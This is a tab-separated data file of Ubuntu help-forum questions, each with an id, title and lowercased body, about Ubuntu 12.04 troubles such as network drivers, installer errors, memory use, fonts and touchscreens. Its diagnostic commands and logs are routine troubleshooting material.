142959	ubuntu 12.04 wired ethernet not working and wireless not working , how do i fix it ?	i am new to ubuntu . i recently installed the latest ubuntu for desktop from http : //www.ubuntu.com/download . i was very excited to start using ubuntu until i booted the computer and saw that i could n't connect to the internet at all . i have spent hours trying to figure this out . i keep running into people suggesting installing drivers etc . i have tried about everything and nothing seems to work . i have the ethernet cable connected to the computer but it does n't recognize it . i ran the following : lspci | grep -i eth and i get this 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5752 gigabit ethernet pci express ( rev 02 ) any help would be much appreciated . i am kind of bummed i have spent all this time tyring to get the internet to work and have n't even gotten to use the power of ubuntu update copied from comment : changing the ethernet cable to a different one fixed the problem .
142962	installation stops with an error message at the `` copying files ... '' step	i 've been trying to install 12.04 lts onto a dell with a pentium iii from cd . booting from the cd , the installer gets through the `` who are you ? '' process and begins copying files . the progress bar gets as far as the last period in `` copying files ... '' . the box clears , and an error box comes up saying : the installer has encountered an unrecoverable error . a desktop session will now be run so that you may investigate the problem or try installing again . when i try to install from this desktop session , the installer gets to the same point , the copying files box closes , and then just stops . the pointer is busy , the cd drive spins up occasionally with no data transfer , and there 's no hard drive activity . when i boot from the cd and access the disk boot menu , the disk checks good and memory checks good ( i upgraded the original memory to 512 mb ) . i also updated the bios to the newest version from dell . this is an older l866r , but should meet the requirements .
142963	ubuntu 12.04 slow and low memory	i have an old laptop , a dell inspiron 8100 , that i use to `` play '' with ubuntu on . it is my `` learning '' machine where i experiment with new os and such , so it is not critical , but i really want it to work well . in it 's original life it ran xp , and ran very well for a machine of it 's generation . i do use it , when i do not have it `` broken '' due to some new os i am playing with , so i do want to fix it . i have been running ubuntu 10.04 on it for a couple of years with good results , and just wiped it and upgraded to 12.04 . the new interface is nice , and i am learning my way around in it , but i am disappointed by the performance . i realize 512 mb is marginal memory , but 10.04 was mostly ok , and so was xp . i have another nearly identical machine running xp and it is fine . i do n't expect miracles in 512 mb , but it needs to be better than it is . i changed vm.swappiness from 60 to 10 . that helped a lot , as it slowed down the incessant banging on the hard drive . i turned off 3d for 2d effects , that helped . examining top i notice a lot of processes running , ( about 200 ) do n't know what else i can turn off . did notice bluetooth ( no bluetooth hardware in this box ) and removed that . do n't know what else might be in there that is unneeded and can be killed off . are there any other tweaks that can reduce the memory footprint and speed things up ? right now it remains broderline unusable . it 's mostly ok as long as i do not use any applications , but any major ap just sends it into a frenzy of swapping . free -mt shows between 5 and 10 mb free most of the time with absolutely nothing running . i am sure that is my problem , but what can i trim away ? i think if i could get that up to 100 or more i would be in clover ... i checked the full startup applications list , and disabled backup , and a few other trivial things , but again nothing much made any difference . so , any ideas ? or has a 512 mb memory machine simply been rendered impractical for ubuntu ? there does not seem to be any way to physically add memory ... maybe i need to get out my xp install disk and return the machine to it 's factory configuration so i can use it , and find another machine for ubuntu `` learning '' . but if i can tweak ubuntu into usability , i would like to do so , so any ideas are welcome .
142967	are there regular gujarati fonts for ubuntu ?	all the fonts supplied with ubuntu gujarati language support have fancy typfaces . the conventional typeface which is seen in all the newspapers is not supplied with ubuntu . there is a third-party gujarati font called saraswati5 which has conventional typeface , but this font does n't render correctly in ubuntu . any suggestions ?
142975	flash stopped working in firefox after i installed vlc	flash aid does not help , nor does uninstalling/reinstalling vlc , flash , and firefox tried disabling other plugins on firefox that may have something to do with flash media also to no avail .
142977	how to type malayalam in ubuntu ?	is it possible to type malayalam language in ubuntu ? if yes , what should i do to type malayalam in ubuntu ?
142984	can i set up two-fingered swiping ?	i can already scroll left and right with two-finger swiping , however , in windows i can use the same gestures to go forward and back in browsers and such . is this possible in ubuntu ?
142987	why ca n't i install from the live cd ?	my install is n't working for some odd reason . after i enter the user info it sits there and then crashes and says : the installer encountered an unrecoverable error . a desktop will now be now run so that you may investigate the problem or try installing again . i hit enter and then it brings me to the desktop . this is with the 12.04 lts desktop cd . no errors were found when i did `` check disc for defects '' .
142989	how should one try and fix bugs in ubuntu ?	given that it can take ages for the software engineers at ubuntu to fix bugs once they are filed , if the user himself or herself wants to fix the bugs in ones system , what are the steps that he or she needs to take ?
142990	gnome 3 - multiple video cards - xinerama -- forced fallback mode	just installed a 2nd nvidia video card -- previously had gnome 3 working perfectly with 2 monitors on a a single video card using twinview tried a number of things thus far twinview on 1 card + xinerama no xinerama no twinview various manual xorg.conf hacks based on random forums ( couple references below ) xinerama no twinview with and without extensions composite the last one is what i 'm using now -- it results in a forced fallback mode with composite disable set at the end of xorg.conf via nvidia-settings section `` extensions '' option `` composite '' `` disable '' endsection when i disabled that last snippet it boots to gnome 3 full with the left monitor on a black screen and the middle monitor as primary but non-responsive switching to console mode ctrl+alt+f1 and then switching back i get 3 black screens with a mouse that can move around but nothing to interact with issue seems related to opengl and the multiple video cards -- i can boot into unity without issue though my glx-dock shows up with the black background as barely shows in the screenshot below indicating the opengl is not initiated has anyone had any luck with getting xinerama to work with multiple nvidia video cards with opengl support ? found this in the logs while looking a bit further [ 23.208 ] ( ii ) nvidia ( 1 ) : setting mode `` nvidia-auto-select+0+0 '' [ 23.254 ] ( ww ) nvidia ( 1 ) : the gpu driving screen 1 is incompatible with the rest of the [ 23.254 ] ( ww ) nvidia ( 1 ) : gpus composing the desktop . opengl rendering will be [ 23.254 ] ( ww ) nvidia ( 1 ) : disabled on screen 1 . [ 23.277 ] ( == ) nvidia ( 1 ) : disabling shared memory pixmaps [ 23.277 ] ( == ) nvidia ( 1 ) : backing store disabled [ 23.277 ] ( == ) nvidia ( 1 ) : silken mouse enabled [ 23.277 ] ( == ) nvidia ( 1 ) : dpms enabled according to this page at the nvidia user docs http : //us.download.nvidia.com/xfree86/linux-x86/173.14.09/readme/chapter-14.html i may be out of luck = ( starting this question with the hopes that others may be able to help debug and perhaps gain answers over time as i really want to get the full gnome 3 back .
142992	where to find the iso file to be burned on a cd/dvd ?	i have n't found a useful answer to similar questions . i have downloaded ubuntu 12.01 to my desktop running windows 7 and it seems to work fine . but i want to make a cd/dvd to be able to boot linux on another desktop pc . i can see that i get an iso file as a result of the download , but as soon as i unzip it there is no longer an iso file . please help . finn nielsen
142994	bash completion does n't work in root user	i 'm on 12.04 and i 'm trying to find a way to enable bash completion in root user . any ideas on how to do that ?
143000	ubuntu logs me out if i touch the screen	i just fixed it so it worked after suspension , and tried to enable multitouch . now if i touch the screen at all , i 'm sent back to the display manager and have to log in again . i 've uninstalled every package i installed today , and it 's still doing it . i have no idea why , or how to figure out why . edit : earlier i found the logs ... turned on a seconds counter , and touched the screen at exactly 15:06:00. # # may 27 15:06:01 luna gnome-session [ 3029 ] : gdk-warning : gnome-session : fatal io error 11 ( resource temporarily unavailable ) on x server :0. # 012 may 27 15:06:02 luna acpid : client 3005 [ 0:0 ] has disconnected may 27 15:06:02 luna acpid : client connected from 3385 [ 0:0 ] may 27 15:06:02 luna acpid : 1 client rule loaded may 27 15:06:06 luna lxdm-binary : pam_ecryptfs : passphrase file wrapped may 27 15:06:12 luna gnome-session [ 3410 ] : warning : unable to find required component 'gnome-shell' may 27 15:06:14 luna rtkit-daemon [ 1835 ] : successfully made thread 3504 of process 3504 ( n/a ) owned by '1000 ' high priority at nice level -11 . may 27 15:06:14 luna rtkit-daemon [ 1835 ] : supervising 1 threads of 1 processes of 1 users . may 27 15:06:14 luna pulseaudio [ 3504 ] : [ pulseaudio ] pid.c : stale pid file , overwriting . may 27 15:06:14 luna rtkit-daemon [ 1835 ] : successfully made thread 3520 of process 3504 ( n/a ) owned by '1000 ' rt at priority 5 . may 27 15:06:14 luna rtkit-daemon [ 1835 ] : supervising 2 threads of 1 processes of 1 users . may 27 15:06:14 luna rtkit-daemon [ 1835 ] : successfully made thread 3521 of process 3504 ( n/a ) owned by '1000 ' rt at priority 5 . may 27 15:06:14 luna rtkit-daemon [ 1835 ] : supervising 3 threads of 1 processes of 1 users . may 27 15:06:15 luna goa [ 3546 ] : goa-daemon version 3.4.0 starting [ main.c:112 , main ( ) ]
143001	xubuntu 12.04 : how to get emacs keybindings ?	i work with xubuntu 12.04 on a macbook air . there are various posts about how to use emacs ' keybindings under gnome ( see , for example , enabling emacs keybind on google chrome , reverting from emacs keybindings in chrome , or http : //www.fettesps.com/ubuntu-emacs-keybindings/ ) . i installed gconf-editor and replaced `` greybird '' by `` emacs '' in desktop - > gnome - > interface - > gtk_theme . this change did not seem to have an effect , though . how can i get emacs keybindings under xubuntu ? [ c-s for `` search '' and c-y for `` paste '' in google chrome , for example ]
143002	12.04 does n't recocognize wifi on acer extensa 5620z	i have a acer extensa 5620z laptop and after installing 12.04 i noticed that it does n't recognize it 's wifi chipset ( intel速 wireless wifi link 4965agn ) . do i need to install additional drivers ? if yes where i can find them ?
143004	how to prevent ubuntu/xubuntu from automounting repositories from ubuntu cds ?	whenever i insert an ubuntu/xubuntu cd into my xubuntu pc the system recognizes it as a package repository . i dislike this behaviour as it is generally useless ( except for those people having no broadband internet connection ) and prevents me from erasing and reusing the cd-rw . can i disable this functionality ?
143006	how to report a bug in content ( not interface ) on ubuntu.com ?	i want to report a bug in the content on the ubuntu website . i do n't know how to properly do this because : this is not a bug in the web server , or in the way a page is coded . it is a content problem , not an interface problem . this is not a broken link , or any other problem that could be trivially fixed by anyone who is not empowered to make substantive content changes to the website . it is unclear how this should best be fixed , and someone ( or some group of people ) will have to make a decision about that . this is not a bug in the help documentation hosted at https : //help.ubuntu.com . this is not a bug in community-contributed content . the bug i want to report is that , at http : //www.ubuntu.com/download/desktop/alternative-downloads , the `` text-based installation '' section does n't explain clearly to an inexperienced person that the text-based installation cd is the `` alternate cd '' , and gives a link that does n't make it easy for a novice to find the right .iso image . i am only including this description here in case it helps people tell me how to report this issue . i am not trying to use askubuntu to file a bug report . honest ! ; - ) where should i go and/or who should i contact , to report this ? is there a launchpad project for the website content that is neither community-contributed nor hosted in the help subdomain ? i know there is an ubuntu-website launchpad project , and i have seen this question which says that website problems should be reported there . is that also the right place to report `` pure content '' problems like the one i have encountered ? since i originally posted this question , aking1012 has pointed out in chat that at least one bug filed against ubuntu-website and accepted is , like this one , a non-trivial content issue . this suggests that i can just report this against ubuntu-website ... but if anyone has a definitive answer with documentation ( or just more examples of such bugs , or personal experience , or if you maintain the ubuntu website ) , i 'd still welcome an answer here .
143007	how to show what programs are running from the panel on the desktop ?	in 12.04 , i wonder how to show what programs are running from the panel on the desktop ? in 10.10 , i managed to create a drop list of opened applications , which takes little space when it is folded up . but in 12.04 , i have no idea how because i forget how i did it in 10.10 . thanks !
143010	should the lack of a launcher icon be considered a bug ?	for example , the window that lets me view my keyboard layout does not have a launcher icon . the unity launcher show a grey question mark instead , which does not feel pretty . having more than one such window open is not only visually displeasing , but cumbersome to navigate . when finding these cases , should i file a bug ? or do design quirks not belong on launchpad ?
143011	chromium does n't open anymore	my chromium browser does n't work . it does n't even start up . typing chromium-browser in the terminal i get this error : [ 18118:18118:5103105507 : fatal : profile_impl.cc ( 315 ) ] failed to create /home/nicholas/.cache/chromium/default abortado ( imagem do năşcleo gravada ) reinstallation does n't fix the problem . i tried to follow steps in chromium does n't work , but without success . thanks .
143014	how to download only recent mails in thunderbird ?	i have an account at hotmail and i have lots of mails there . ( more than 10000 ) i do n't want thunderbird to download them all , also because i have really slow connection . is there a way to make thunderbird download only mails more recent than , for example , 10days ago ?
143015	mouse selects everything on its own	i have a strange problem that my mouse keeps selecting everything i point to . for example , if i open rhythmbox , then at the top of the screen there is a text which says which song is playing . if i move my mouse over this text , then it will select this text ; but i am not clicking . this behaviour does not happen in all programs . for example in firefox i have no problem at all . maybe it is gtk related ? nautilus also behaves strangely ; i can not open files by clicking on them , i have to select and make a box around the file and then press enter to open it . if i click , then nothing happens . similar problems also happen with other gtk software . i think the problem might be related to touchscreen issues ( i have a touchscreen ) . i run gnome 3 on ubuntu 12.04 . i have a hp touchsmart 610 desktop computer . any help is greatly appreciated . update : i just did a fresh reinstall , and i am 90 % certain that it is related to the touchscreen drivers . here is what happens when i reinstall . at first boot , so exactly after install , everything works fine , except the touchscreen : the touchscreen does not respond . i update ubuntu , because i installed from an old cd ( cd with ub . 12.04 ) . then on next reboot i have touchscreen working , but the working touchscreen comes together with the mouse selecting everything on its own . second question : would anybody know how i could figure out what those touchscreen drivers are ( so that i can disable them ) ?
143019	none of the dvds can be read	it does not matter what kind of dvd i try to play on either my dvd-rom or my dvd-r/rw i get the same error message from vlc media player . i have tried all disc device options . this is the error message : playback failure : dvdread could not open the disc `` /dev/dvd '' . your input ca n't be opened : vlc is unable to open the mrl 'dvd : ///dev/dvd ' . check the log for details .
143021	not detecting hdd after installing ubuntu 12.04 !	after installing ubuntu 12.04 , which i 'm using right now and it works great , my extra hard drive was detected the first time i turned on my computer but then it does not show anymore on my home folder , when i run the disk utility says that has a few errors but when i try to fix it , says that hard drive is busy and can not do anything else . i 've unmounted it and mounted again but nothing happens . do you know what can be going on ? cause the first time that i was able to see my hard drive it had all the files i have , but i do n't know if deleting the partition will format the whole hard drive or just the ubuntu files . thanks in advance ! by the way , i 'm new to ubuntu ... : s
143024	how can i create a samba share from the command line ?	as part of the installation step of some software on a ubuntu vm i 'd like to create a samba share . how would i go about doing that from the command line ?
143026	minecraft error - says not downloaded	when i try to run minecraft ( using jdk 6 ) it says login failed , not downloaded . how do i rectify this ? i do n't know what to do and all the instructions say that the game should run right out of the launcher .
143027	lost ? /corrupted ? seagate 500gb external disk	i am not expert and need a patient guide . history of events : only xp in internal disk with documents on a seagate 500gb installed ubuntu by partitioning external disk and booting from it during xp use , seagate repeatedly autorun and making a click sound . ubuntu no longer accessible . internal hard disk partitioned and xubuntu installed . xubuntu filesystem can only see one of the partitions on seagate , which contains a folder lost & found but wo n't let me access it because it is owned by root and when i open a terminal window and type `` su '' i get authentication failure when i type in the only password i have ever given it . yet i can install new packages with administrator password . testdisk ca n't see any partitions on seagate disk ! !
143028	ubuntu 12.04 does n't show wired connection , windows 7 does	i have a wired connection in my student dorm room which does n't come up in network-manager with 12.04 . it does work with windows 7 though , so it 's not anything hardware related i would say . on a spare partition on my hd i tried installing another 12.04 , just to be sure it was n't some configuration of mine being wrong : turns out , it does n't work either . the funny thing is that nm would recognize the connection until yesterday , so i thought some update had to with this , but there was nothing in the logs that seems to be able to break something network related . my /etc/networkmanager/networkmanager.conf [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false my /etc/network/interfaces auto lo iface lo inet loopback auto eth0 # iface eth0 inet dhcp i do n't know why the last line is commented , but i tried uncommenting it but it would n't work and even worse it would say `` device unmanaged '' . i then tried setting managed=true but it went back to not recognizing the connection so i just rolled everything back . ifconfig eth0 : eth0 link encap : ethernet hwaddr 00:26:9e:0a:2a : e3 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:47 base address:0xc000 lshw -c network : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:26:9e:0a:2a : e3 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=n/a latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:47 ioport:5000 ( size=256 ) memory : d1010000-d1010fff memory : d1000000-d100ffff memory : d1020000-d102ffff lspci : 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 02 ) /var/log/dpkg.log ( just the part for yesterday , because yesterday connection worked ) : 2012-05-26 12:56:56 startup archives unpack 2012-05-26 12:57:11 upgrade libgnome-control-center1 1:3.4.1-0ubuntu2 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:11 status half-configured libgnome-control-center1 1:3.4.1-0ubuntu2 2012-05-26 12:57:12 status unpacked libgnome-control-center1 1:3.4.1-0ubuntu2 2012-05-26 12:57:12 status half-installed libgnome-control-center1 1:3.4.1-0ubuntu2 2012-05-26 12:57:12 status half-installed libgnome-control-center1 1:3.4.1-0ubuntu2 2012-05-26 12:57:12 status unpacked libgnome-control-center1 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:12 status unpacked libgnome-control-center1 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:12 upgrade gnome-control-center-data 1:3.4.1-0ubuntu2 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:12 status half-configured gnome-control-center-data 1:3.4.1-0ubuntu2 2012-05-26 12:57:12 status unpacked gnome-control-center-data 1:3.4.1-0ubuntu2 2012-05-26 12:57:13 status half-installed gnome-control-center-data 1:3.4.1-0ubuntu2 2012-05-26 12:57:13 status triggers-pending hicolor-icon-theme 0.12-1ubuntu2 2012-05-26 12:57:13 status half-installed gnome-control-center-data 1:3.4.1-0ubuntu2 2012-05-26 12:57:13 status half-installed gnome-control-center-data 1:3.4.1-0ubuntu2 2012-05-26 12:57:13 status unpacked gnome-control-center-data 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:14 status unpacked gnome-control-center-data 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:14 upgrade gnome-control-center 1:3.4.1-0ubuntu2 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:14 status half-configured gnome-control-center 1:3.4.1-0ubuntu2 2012-05-26 12:57:14 status unpacked gnome-control-center 1:3.4.1-0ubuntu2 2012-05-26 12:57:14 status half-installed gnome-control-center 1:3.4.1-0ubuntu2 2012-05-26 12:57:14 status triggers-pending man-db 2.6.1-2 2012-05-26 12:57:14 status half-installed gnome-control-center 1:3.4.1-0ubuntu2 2012-05-26 12:57:14 status triggers-pending bamfdaemon 0.2.118-0ubuntu0.1 2012-05-26 12:57:14 status half-installed gnome-control-center 1:3.4.1-0ubuntu2 2012-05-26 12:57:14 status triggers-pending desktop-file-utils 0.20-0ubuntu2 2012-05-26 12:57:14 status half-installed gnome-control-center 1:3.4.1-0ubuntu2 2012-05-26 12:57:15 status triggers-pending gnome-menus 3.4.0-0ubuntu1 2012-05-26 12:57:15 status half-installed gnome-control-center 1:3.4.1-0ubuntu2 2012-05-26 12:57:15 status half-installed gnome-control-center 1:3.4.1-0ubuntu2 2012-05-26 12:57:15 status unpacked gnome-control-center 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:15 status unpacked gnome-control-center 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:15 upgrade linux-libc-dev 3.2.0-24.39 3.2.0-25.40 2012-05-26 12:57:15 status half-configured linux-libc-dev 3.2.0-24.39 2012-05-26 12:57:16 status unpacked linux-libc-dev 3.2.0-24.39 2012-05-26 12:57:16 status half-installed linux-libc-dev 3.2.0-24.39 2012-05-26 12:57:17 status half-installed linux-libc-dev 3.2.0-24.39 2012-05-26 12:57:17 status unpacked linux-libc-dev 3.2.0-25.40 2012-05-26 12:57:18 status unpacked linux-libc-dev 3.2.0-25.40 2012-05-26 12:57:18 trigproc hicolor-icon-theme 0.12-1ubuntu2 0.12-1ubuntu2 2012-05-26 12:57:18 status half-configured hicolor-icon-theme 0.12-1ubuntu2 2012-05-26 12:57:26 status installed hicolor-icon-theme 0.12-1ubuntu2 2012-05-26 12:57:26 trigproc man-db 2.6.1-2 2.6.1-2 2012-05-26 12:57:26 status half-configured man-db 2.6.1-2 2012-05-26 12:57:28 status installed man-db 2.6.1-2 2012-05-26 12:57:28 trigproc bamfdaemon 0.2.118-0ubuntu0.1 0.2.118-0ubuntu0.1 2012-05-26 12:57:28 status half-configured bamfdaemon 0.2.118-0ubuntu0.1 2012-05-26 12:57:28 status installed bamfdaemon 0.2.118-0ubuntu0.1 2012-05-26 12:57:28 trigproc desktop-file-utils 0.20-0ubuntu2 0.20-0ubuntu2 2012-05-26 12:57:28 status half-configured desktop-file-utils 0.20-0ubuntu2 2012-05-26 12:57:28 status installed desktop-file-utils 0.20-0ubuntu2 2012-05-26 12:57:29 trigproc gnome-menus 3.4.0-0ubuntu1 3.4.0-0ubuntu1 2012-05-26 12:57:29 status half-configured gnome-menus 3.4.0-0ubuntu1 2012-05-26 12:57:29 status installed gnome-menus 3.4.0-0ubuntu1 2012-05-26 12:57:29 startup packages configure 2012-05-26 12:57:29 configure libgnome-control-center1 1:3.4.2-0ubuntu0.2 < none > 2012-05-26 12:57:29 status unpacked libgnome-control-center1 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:30 status half-configured libgnome-control-center1 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:30 status installed libgnome-control-center1 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:30 status triggers-pending libc-bin 2.15-0ubuntu10 2012-05-26 12:57:30 configure gnome-control-center-data 1:3.4.2-0ubuntu0.2 < none > 2012-05-26 12:57:30 status unpacked gnome-control-center-data 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:30 status unpacked gnome-control-center-data 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:30 status unpacked gnome-control-center-data 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:30 status half-configured gnome-control-center-data 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:30 status installed gnome-control-center-data 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:31 configure gnome-control-center 1:3.4.2-0ubuntu0.2 < none > 2012-05-26 12:57:31 status unpacked gnome-control-center 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:31 status half-configured gnome-control-center 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:31 status installed gnome-control-center 1:3.4.2-0ubuntu0.2 2012-05-26 12:57:31 configure linux-libc-dev 3.2.0-25.40 < none > 2012-05-26 12:57:31 status unpacked linux-libc-dev 3.2.0-25.40 2012-05-26 12:57:31 status half-configured linux-libc-dev 3.2.0-25.40 2012-05-26 12:57:31 status installed linux-libc-dev 3.2.0-25.40 2012-05-26 12:57:31 trigproc libc-bin 2.15-0ubuntu10 < none > 2012-05-26 12:57:31 status half-configured libc-bin 2.15-0ubuntu10 2012-05-26 12:57:32 status installed libc-bin 2.15-0ubuntu10 2012-05-26 15:15:55 startup archives unpack 2012-05-26 15:15:56 install linux-image-3.2.0-25-generic < none > 3.2.0-25.40 2012-05-26 15:15:56 status half-installed linux-image-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:16:06 status unpacked linux-image-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:16:06 status unpacked linux-image-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:16:06 upgrade linux-generic 3.2.0.24.26 3.2.0.25.27 2012-05-26 15:16:06 status half-configured linux-generic 3.2.0.24.26 2012-05-26 15:16:06 status unpacked linux-generic 3.2.0.24.26 2012-05-26 15:16:06 status half-installed linux-generic 3.2.0.24.26 2012-05-26 15:16:07 status half-installed linux-generic 3.2.0.24.26 2012-05-26 15:16:07 status unpacked linux-generic 3.2.0.25.27 2012-05-26 15:16:07 status unpacked linux-generic 3.2.0.25.27 2012-05-26 15:16:07 upgrade linux-image-generic 3.2.0.24.26 3.2.0.25.27 2012-05-26 15:16:07 status half-configured linux-image-generic 3.2.0.24.26 2012-05-26 15:16:07 status unpacked linux-image-generic 3.2.0.24.26 2012-05-26 15:16:07 status half-installed linux-image-generic 3.2.0.24.26 2012-05-26 15:16:07 status half-installed linux-image-generic 3.2.0.24.26 2012-05-26 15:16:07 status unpacked linux-image-generic 3.2.0.25.27 2012-05-26 15:16:08 status unpacked linux-image-generic 3.2.0.25.27 2012-05-26 15:16:08 install linux-headers-3.2.0-25 < none > 3.2.0-25.40 2012-05-26 15:16:08 status half-installed linux-headers-3.2.0-25 3.2.0-25.40 2012-05-26 15:16:18 status unpacked linux-headers-3.2.0-25 3.2.0-25.40 2012-05-26 15:16:18 status unpacked linux-headers-3.2.0-25 3.2.0-25.40 2012-05-26 15:16:18 install linux-headers-3.2.0-25-generic < none > 3.2.0-25.40 2012-05-26 15:16:18 status half-installed linux-headers-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:16:21 status unpacked linux-headers-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:16:21 status unpacked linux-headers-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:16:21 upgrade linux-headers-generic 3.2.0.24.26 3.2.0.25.27 2012-05-26 15:16:21 status half-configured linux-headers-generic 3.2.0.24.26 2012-05-26 15:16:21 status unpacked linux-headers-generic 3.2.0.24.26 2012-05-26 15:16:21 status half-installed linux-headers-generic 3.2.0.24.26 2012-05-26 15:16:21 status half-installed linux-headers-generic 3.2.0.24.26 2012-05-26 15:16:21 status unpacked linux-headers-generic 3.2.0.25.27 2012-05-26 15:16:21 status unpacked linux-headers-generic 3.2.0.25.27 2012-05-26 15:16:22 startup packages configure 2012-05-26 15:16:22 configure linux-image-3.2.0-25-generic 3.2.0-25.40 < none > 2012-05-26 15:16:22 status unpacked linux-image-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:16:22 status half-configured linux-image-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:17:02 status installed linux-image-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:17:02 configure linux-image-generic 3.2.0.25.27 < none > 2012-05-26 15:17:02 status unpacked linux-image-generic 3.2.0.25.27 2012-05-26 15:17:02 status half-configured linux-image-generic 3.2.0.25.27 2012-05-26 15:17:02 status installed linux-image-generic 3.2.0.25.27 2012-05-26 15:17:02 configure linux-generic 3.2.0.25.27 < none > 2012-05-26 15:17:02 status unpacked linux-generic 3.2.0.25.27 2012-05-26 15:17:02 status half-configured linux-generic 3.2.0.25.27 2012-05-26 15:17:03 status installed linux-generic 3.2.0.25.27 2012-05-26 15:17:03 configure linux-headers-3.2.0-25 3.2.0-25.40 < none > 2012-05-26 15:17:03 status unpacked linux-headers-3.2.0-25 3.2.0-25.40 2012-05-26 15:17:03 status half-configured linux-headers-3.2.0-25 3.2.0-25.40 2012-05-26 15:17:03 status installed linux-headers-3.2.0-25 3.2.0-25.40 2012-05-26 15:17:03 configure linux-headers-3.2.0-25-generic 3.2.0-25.40 < none > 2012-05-26 15:17:03 status unpacked linux-headers-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:17:03 status half-configured linux-headers-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:17:03 status installed linux-headers-3.2.0-25-generic 3.2.0-25.40 2012-05-26 15:17:04 configure linux-headers-generic 3.2.0.25.27 < none > 2012-05-26 15:17:04 status unpacked linux-headers-generic 3.2.0.25.27 2012-05-26 15:17:04 status half-configured linux-headers-generic 3.2.0.25.27 2012-05-26 15:17:04 status installed linux-headers-generic 3.2.0.25.27 2012-05-26 17:51:12 startup archives unpack 2012-05-26 17:51:12 install gir1.2-gucharmap-2.90 < none > 1:3.4.1.1-0ubuntu1 2012-05-26 17:51:12 status half-installed gir1.2-gucharmap-2.90 1:3.4.1.1-0ubuntu1 2012-05-26 17:51:12 status unpacked gir1.2-gucharmap-2.90 1:3.4.1.1-0ubuntu1 2012-05-26 17:51:12 status unpacked gir1.2-gucharmap-2.90 1:3.4.1.1-0ubuntu1 2012-05-26 17:51:13 install gedit-plugins < none > 3.3.4-0ubuntu1 2012-05-26 17:51:13 status half-installed gedit-plugins 3.3.4-0ubuntu1 2012-05-26 17:51:13 status triggers-pending libglib2.0-0 : i386 2.32.1-0ubuntu2 2012-05-26 17:51:14 status half-installed gedit-plugins 3.3.4-0ubuntu1 2012-05-26 17:51:14 status triggers-pending libglib2.0-0 2.32.1-0ubuntu2 2012-05-26 17:51:14 status half-installed gedit-plugins 3.3.4-0ubuntu1 2012-05-26 17:51:14 status unpacked gedit-plugins 3.3.4-0ubuntu1 2012-05-26 17:51:14 status unpacked gedit-plugins 3.3.4-0ubuntu1 2012-05-26 17:51:14 trigproc libglib2.0-0 : i386 2.32.1-0ubuntu2 2.32.1-0ubuntu2 2012-05-26 17:51:14 status half-configured libglib2.0-0 : i386 2.32.1-0ubuntu2 2012-05-26 17:51:16 status installed libglib2.0-0 : i386 2.32.1-0ubuntu2 2012-05-26 17:51:16 trigproc libglib2.0-0 2.32.1-0ubuntu2 2.32.1-0ubuntu2 2012-05-26 17:51:16 status half-configured libglib2.0-0 2.32.1-0ubuntu2 2012-05-26 17:51:16 status installed libglib2.0-0 2.32.1-0ubuntu2 2012-05-26 17:51:17 startup packages configure 2012-05-26 17:51:17 configure gir1.2-gucharmap-2.90 1:3.4.1.1-0ubuntu1 < none > 2012-05-26 17:51:17 status unpacked gir1.2-gucharmap-2.90 1:3.4.1.1-0ubuntu1 2012-05-26 17:51:17 status half-configured gir1.2-gucharmap-2.90 1:3.4.1.1-0ubuntu1 2012-05-26 17:51:17 status installed gir1.2-gucharmap-2.90 1:3.4.1.1-0ubuntu1 2012-05-26 17:51:17 configure gedit-plugins 3.3.4-0ubuntu1 < none > 2012-05-26 17:51:17 status unpacked gedit-plugins 3.3.4-0ubuntu1 2012-05-26 17:51:17 status half-configured gedit-plugins 3.3.4-0ubuntu1 2012-05-26 17:51:17 status installed gedit-plugins 3.3.4-0ubuntu1 any idea ?
143030	verify integrity of installed ubuntu packages	i 'm looking for a script that is run from a boot-cd doing the following for all files on a drive : find the debian-package a file is from ( if possible ) download and extract the debian-package generate md5sums for the installed file and the downloaded file list differences and files that were n't packaged is something like this readily available ? ( i do n't trust the local deb-archive . ) chris
